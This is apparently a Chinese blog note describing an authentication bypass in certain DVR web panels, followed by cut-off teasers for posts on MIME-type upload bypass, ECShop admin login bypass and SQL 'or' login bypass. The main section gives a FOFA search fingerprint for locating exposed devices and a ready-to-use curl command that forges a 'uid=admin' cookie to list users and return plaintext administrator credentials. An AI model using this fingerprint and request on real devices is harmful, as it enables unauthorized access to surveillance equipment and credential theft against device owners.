————背景說明————
個人方面沒什麼意圖,主要之前有一次要做個賦能,順口講了一下,其實很簡單,就簡單記錄一下。
此漏洞通過修改」cookie:uid=admin」,以此訪問特定dvr的控制面板,並可以返回此裝置的明文管理員憑證。
————實驗過程————
fofa搜尋特徵:"/longin.rsp"
利用方式:curl "http://url/device.rsp?opt=user&cmd=list" -h "cookie: uid=admin"
然後登入唄
MIME型別繞過漏洞
實驗環境 實驗目的 實驗工具 實驗內容 mime mime 客戶端軟體,區分不同種類的資料,例如web瀏覽器就是通過mime型別來判斷檔案是gif,還是可列印的postscript檔案。web伺服器使用mime來說明傳送資料的種類,web客戶端使用mime來說明希望接收到的資料種類。mime檢測原理...
ecshop後台登入繞過
這個習科上已經發過了,我這裡發一段跟習科不同的吧。這是習科發布的方法,這裡做個記錄。admin privilege.php if empty ec salt else 省略 if isset post remember hashcode hash code db getone select valu...
繞過登入進後台
我們都知道後台登陸驗證一般的方式都是將使用者在登入口輸入的賬號密碼拿去與資料庫中的記錄做驗證,並且要求輸入的賬號密碼要等於資料庫中某條記錄的賬號密碼,驗證通過則程式就會給使用者乙個sssion,然後進入後台,否則就返回到登陸口。而對於 or or 漏洞,我們先來看以下 pwd request.for...